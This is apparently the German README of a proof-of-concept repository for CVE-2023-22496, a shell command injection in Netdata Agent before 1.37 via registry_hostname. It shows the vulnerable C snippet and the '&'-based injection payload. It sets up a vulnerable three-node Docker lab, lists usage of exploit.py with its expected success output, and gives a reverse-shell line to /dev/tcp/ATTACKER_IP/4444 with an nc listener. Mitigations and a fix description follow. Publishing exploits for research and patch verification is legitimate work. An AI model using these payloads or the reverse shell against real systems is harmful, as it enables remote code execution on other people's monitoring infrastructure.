
PoC für CVE-2023-22496: Netdata Agent <1.37 OS-Befehlsinjektion über registry_hostname
Schweregrad: Kritisch (CVSS 9.8)
Betroffen: Netdata Agent < 1.37.0
Behoben in: v1.37.0
Typ: OS-Command-Injection (CWE-78)
CVE-2023-22496 ist eine OS-Command-Injection-Schwachstelle im Health-Alarm-Benachrichtigungssystem von Netdata. Der registry_hostname eines beliebigen Knotens in einer Streaming-Kette wird ohne Bereinigung in einen Shell-Befehl eingefügt. Ein Angreifer, der registry hostname in einer Netdata-Konfigurationsdatei setzen kann, erlangt Remote-Code-Ausführung als Benutzer des netdata-Prozesses auf jedem übergeordneten Knoten, der den Alarm verarbeitet.
health/health.cstatic inline int health_alarm_execute(RRDHOST *host, ALARM_ENTRY *ae) {
...
char cmd[LEN + 1];
snprintfz(cmd, LEN,
"exec %s '%s' '%s' '%s' '%s' '%s' '%s' '%s' '%s' '%s' '%s' '%s' '%s'",
exec, // alarm-notify.sh
recipient, // e.g. "root"
host->registry_hostname, // ← NO SANITISATION — attacker-controlled
ae->name,
...
);
ae->exec_code = spawn_enq_cmd(cmd); // run via /bin/sh
...
}
spawn_enq_cmd übergibt die Zeichenkette an /bin/sh -c, das sie als Shell auswertet. Da registry_hostname nie bereinigt wird, kann ein Angreifer beliebige Shell-Befehle einschleusen.
exec-ProzessersetzungDie naive Injektion `'; cmd; '` funktioniert nicht, da das Shell-Builtin exec den aktuellen Shell-Prozess ersetzt, sodass der injizierte ;cmd;-Teil nie erreicht wird.
Funktionierender Bypass – Verwenden Sie & (Hintergrundoperator):
# What Netdata builds after injection:
exec alarm-notify.sh 'root' 'x' & touch /tmp/pwned & # ' arg3 arg4 ...
# Execution flow:
# exec alarm-notify.sh 'root' 'x' & → runs in background; shell stays alive
# touch /tmp/pwned & → shell evaluates this; file created
# # → rest is a comment; ignored
┌──────────────┐ stream ┌──────────────┐ stream ┌──────────────────────┐
│ agent_child │ ───────▶ │ agent_middle │ ───────▶ │ agent_parent │
│ (attacker) │ │ (relay) │ │ (victim / target) │
└──────────────┘ └──────────────┘ └──────────────────────┘
│
health_alarm_execute() fires
with injected registry_hostname
→ RCE on agent_parent
Der Angreifer muss lediglich irgendeinen Knoten in der Streaming-Kette kontrollieren. Der registry_hostname wird im Stream-Protokoll weitergegeben und von jedem übergeordneten Knoten unverändert verwendet, wenn dieser health_alarm_execute aufruft.
CVE-2023-22496-PoC/
├── Dockerfile # Builds netdata-vuln:v1.36.1 from source
├── docker-compose.yaml # 3-node vulnerable streaming environment
├── exploit.py # Standalone exploit script
├── config/
│ ├── parent_netdata.conf # Parent config (writable — exploit overwrites this)
│ ├── parent_stream.conf # Parent accepts streams + evaluates health
│ ├── parent_guid # Fixed node GUID
│ ├── middle_netdata.conf # Middle relay config
│ ├── middle_stream.conf
│ ├── middle_guid
│ ├── child_netdata.conf # Child sender config
│ ├── child_stream.conf
│ └── child_guid
└── README.md
docker compose)git clone https://github.com/YOUR_HANDLE/CVE-2023-22496-PoC.git
cd CVE-2023-22496-PoC
# Build takes ~5–15 min (compiles Netdata from source)
docker build -t netdata-vuln:v1.36.1 .
docker compose up -d
Warten Sie etwa 15 Sekunden, bis Netdata initialisiert ist, und überprüfen Sie dann:
# Parent web UI should return HTTP 200
curl -s http://localhost:21000/api/v1/info | python3 -m json.tool | grep version
# Expected: "version": "v1.36.1-..."
# Default: create /tmp/pwned on the target (agent_parent)
python3 exploit.py "touch /tmp/pwned"
# Verify
docker exec agent_parent ls /tmp/pwned
# /tmp/pwned
Erwartete Ausgabe:
======================================================================
CVE-2023-22496 — Netdata registry_hostname Command Injection PoC
======================================================================
Shell command : 'touch /tmp/pwned'
Injected host : "x' & touch /tmp/pwned & #"
[*] Pre-flight: verifying Docker environment
[*] All 3 containers are running.
[*] Step 1: Writing injected netdata.conf for agent_parent
Written: config/parent_netdata.conf
registry hostname = "x' & touch /tmp/pwned & #"
[*] Step 2: Restarting agent_parent to load injected config
...
agent_parent is up and responding.
[*] Step 3: Waiting 65s for a disk_space WARNING alarm
[*] Step 4: Checking for command execution evidence
======================================================================
✅ SUCCESS — CVE-2023-22496 CONFIRMED
'/tmp/pwned' exists on agent_parent
======================================================================
# On your listener machine:
nc -lvnp 4444
# Run exploit (replace ATTACKER_IP):
python3 exploit.py "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
python3 exploit.py "id > /tmp/id.txt"
docker exec agent_parent cat /tmp/id.txt
# uid=998(netdata) gid=998(netdata) groups=998(netdata)
# Stop and remove containers + volumes
docker compose down -v
# Remove the image
docker rmi netdata-vuln:v1.36.1
| Aktion | Details |
|---|---|
| Upgrade | Netdata Agent auf ≥ v1.37.0 aktualisieren |
| Einschränken | Schreibzugriff auf netdata.conf einschränken |
| Netzwerk | Streaming-Ports (19999/tcp) nur auf vertrauenswürdigen Netzwerken isolieren |
| Überprüfen | netdata --version – bestätigen, dass Sie keine Pre-1.37-Version verwenden |
Der Fix in v1.37.0 bereinigt registry_hostname, indem alle Zeichen außerhalb von [a-zA-Z0-9._-] abgelehnt werden, bevor der Wert in den Shell-Befehl eingefügt wird.
Dieses Repository wird ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken bereitgestellt. Die Ausführung dieses PoCs gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben, ist illegal. Die Autoren übernehmen keine Haftung für Missbrauch.